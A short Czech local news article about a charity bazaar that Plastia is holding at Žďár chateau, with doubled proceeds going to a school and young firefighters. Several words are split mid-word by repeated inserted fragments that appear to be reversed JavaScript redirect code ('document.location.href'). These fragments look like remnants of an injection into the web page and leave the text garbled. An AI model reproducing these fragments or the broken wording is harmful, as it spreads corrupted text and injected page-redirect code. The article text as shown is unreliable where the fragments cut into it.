Rainbow page separator

Plastia uspořádá v zámku bazar, výtěžek pomůže žďárské mládeži

Čtvrtek, 22. listopadu 2018

Žďár nad Sázavou / Škole Na Radosti a mladým hasičům ze Žďáru připadne zdvojený výtěžek dobročinného bazaru novoveselské firmy Plastia, který se ve dnech 23. a 24. lis[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];topadu uskuteční ve žďárském zámku.
„Je [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to takový blešák plný oblečení, knížek, desek a různých drobností, kde si můžete posedět, zaposlouchat se do skvělé muziky, povykládat si a hlavně nakoupit,“ popsala akci majitelka firmy Plastia Lenka Novotná, která s nápadem zapojit do pomoci smysluplným projektům co nejvíce lidí přišla už před třemi lety. První takzvaný Dobrobazar se uskutečnil v Novém Veselí. Později se přesunul do lidnatějšího Žďáru s cílem zvýšit výtěžek akce.
V minulých letech se výtěžek dobročinného bazaru pohyboval okolo deseti tisíc korun. I le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tos získanou sumu Plastia „dorovná“ do dvojnásobku a ten[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tokrát rovnoměrně rozdělí mezi školu Na Radosti a mladé žďárské hasiče. Hasičský sbor plánuje využít dar na rekonstrukci hřiště pro trénink mladých hasičů v ulici Dvorská.